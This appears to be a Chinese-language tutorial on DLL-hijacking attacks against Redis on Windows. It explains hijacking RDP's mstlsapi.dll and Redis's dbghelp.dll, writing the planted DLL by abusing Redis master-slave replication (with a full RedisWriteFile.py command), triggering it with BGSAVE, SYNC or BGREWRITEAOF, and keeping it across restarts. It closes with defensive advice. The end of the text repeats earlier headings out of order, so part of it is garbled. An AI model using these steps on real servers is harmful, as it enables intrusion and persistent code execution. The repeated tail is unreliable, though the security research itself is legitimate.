Redis on Windows 出网利用探索 - 详细教学文档<\/h1>

1. 前言<\/h2>
本文详细讲解在Windows环境下Redis服务的DLL劫持利用技术，特别是针对Redis自身命令触发的DLL劫持场景。与传统的DLL劫持技术不同，本文重点探索Redis服务自身命令执行过程中触发的DLL加载行为，实现主动触发的利用方式。<\/p>

2. 环境准备<\/h2>

2.1 目标环境<\/h3>

操作系统: Windows Server 2012<\/li>
Redis版本: 3.2.100<\/li>
权限要求: Administrator或Network Service<\/li>

开放端口: 80(IIS), 3389(RDP), 6379(Redis)<\/li> <\/ul>

2.2 工具准备<\/h3>

Procmon (进程监视工具)<\/li>
DLLHijacker.py (DLL劫持项目生成工具)<\/li>
RedisWriteFile.py (Redis文件写入工具)<\/li>

Visual Studio (编译劫持DLL)<\/li> <\/ul>

3. 传统利用方法回顾<\/h2>

在Windows环境下Redis的常见利用方法包括：<\/p>

写Webshell<\/li>
修改启动项(Startup)<\/li>
DLL劫持与篡改<\/li>

MOF文件利用<\/li> <\/ol>

4. RDP服务的DLL劫持利用<\/h2>

4.1 发现过程<\/h3>
使用Procmon监视RDP连接过程，发现`mstlsapi.dll<\/code>加载失败的情况。该DLL与RDP证书加密相关。<\/p>`

4.2 劫持步骤<\/h3>

使用DLLHijacker.py生成劫持项目：
python3 DLLHijacker.py mstlsapi.dll
<\/span><\/span><\/code><\/pre><\/li>
生成的VS项目会自动转发所有导出函数(约106个)<\/li>
修改项目中的原DLL路径为写入路径(如C:\Users\Public\Downloads\mstlsapi.dll<\/code>)<\/li>
编译生成劫持DLL<\/li>
<\/ol>
4.3 文件写入<\/h3>
使用Redis主从复制写入文件：<\/p>
python3 RedisWriteFile.py --rhost=<\/span>192.168.56.140 --rport=<\/span>6379<\/span> \
<\/span><\/span><\/span><\/span>--lhost=<\/span>192.168.56.1 --rpath=<\/span>"C:\Windows"<\/span> \
<\/span><\/span><\/span><\/span>--rfile=<\/span>"mstlsapi.dll"<\/span> --lfile=<\/span>"\/tmp\/mstlsapiJ.dll"<\/span>
<\/span><\/span><\/code><\/pre>4.4 注意事项<\/h3>

劫持DLL需要与原DLL同时存在<\/li>
需在Hijack函数后执行FreeLibrary，避免只能触发一次<\/li>
Shellcode执行应避免阻塞DLL加载过程<\/li>
<\/ul>
5. Redis自身命令的DLL劫持<\/h2>
5.1 发现过程<\/h3>
通过Procmon监视Redis命令执行，发现以下命令会触发DLL加载：<\/p>

SYNC\/PSYNC (主从复制)<\/li>
BGSAVE (后台保存)<\/li>
BGREWRITEAOF (AOF重写)<\/li>
<\/ul>
特别是dbghelp.dll<\/code>的加载行为，由于不在KnownDLLs列表中，会优先从Redis安装目录加载。<\/p>
5.2 利用条件<\/h3>

Redis安装目录(如C:\Program Files\Redis<\/code>)有写入权限<\/li>
Network Service用户默认拥有该目录完全控制权限<\/li>
<\/ul>
5.3 利用步骤<\/h3>

使用DLLHijacker.py生成dbghelp.dll劫持项目<\/li>
修改原DLL路径为C:\Windows\System32\dbghelp.dll<\/code><\/li>
编译生成劫持DLL<\/li>
通过Redis写入安装目录<\/li>
执行以下任一命令触发：
BGSAVE
SYNC
BGREWRITEAOF
<\/code><\/pre>
<\/li>
<\/ol>
5.4 持久化效果<\/h3>

Redis服务重启后会重新加载劫持DLL<\/li>
伴随持久化操作自动触发<\/li>
<\/ul>
6. 防御建议<\/h2>

在加载DLL时使用绝对路径<\/li>
调用SetDllDirectory(L"")<\/code>排除当前目录<\/li>
使用LoadLibraryEx<\/code>并指定LOAD_LIBRARY_SEARCH<\/code>系列标志<\/li>
验证DLL的合法性和数字签名<\/li>
限制Redis安装目录的写入权限<\/li>
<\/ol>
7. 测试验证环境<\/h2>
已验证的环境包括：<\/p>

Windows Server 2012 \/ Redis 3.2.100<\/li>
Windows 7 \/ Redis 3.0.504<\/li>
Windows Server 2008 \/ Redis 2.8.2103<\/li>
<\/ul>
8. 补充说明<\/h2>

主从复制可能导致数据清空问题，可使用redis-dump-go<\/code>工具解决<\/li>
不同Windows版本的dbghelp.dll<\/code>存在差异，建议使用同版本DLL<\/li>
该利用依赖主从复制写文件能力，公网利用需目标出网<\/li>
<\/ol>
9. 参考资源<\/h2>

Redis官方文档: https:\/\/redis.io\/<\/li>
DLL劫持技术详解: https:\/\/kiwings.github.io\/2019\/04\/04\/th-DLL劫持\/<\/li>
Redis主从复制原理: https:\/\/juejin.im\/post\/6844903943764443149<\/li>
Redis持久化机制: https:\/\/juejin.im\/post\/6844903939339452430<\/li>
Redis-Windows DLL劫持: https:\/\/jkme.github.io\/redis-on-windows-dll-hijack.html<\/li>
<\/ol>
通过本文介绍的方法，安全研究人员可以更全面地评估Windows环境下Redis服务的安全风险，并采取相应的防护措施。<\/p>

Redis on Windows 出网利用探索 - 详细教学文档<\/h1>

2. 环境准备<\/h2>

4. RDP服务的DLL劫持利用<\/h2>

4.1 发现过程<\/h3> 使用Procmon监视RDP连接过程，发现mstlsapi.dll<\/code>加载失败的情况。该DLL与RDP证书加密相关。<\/p>

5. Redis自身命令的DLL劫持<\/h2>

4.1 发现过程<\/h3>
使用Procmon监视RDP连接过程，发现`mstlsapi.dll<\/code>加载失败的情况。该DLL与RDP证书加密相关。<\/p>`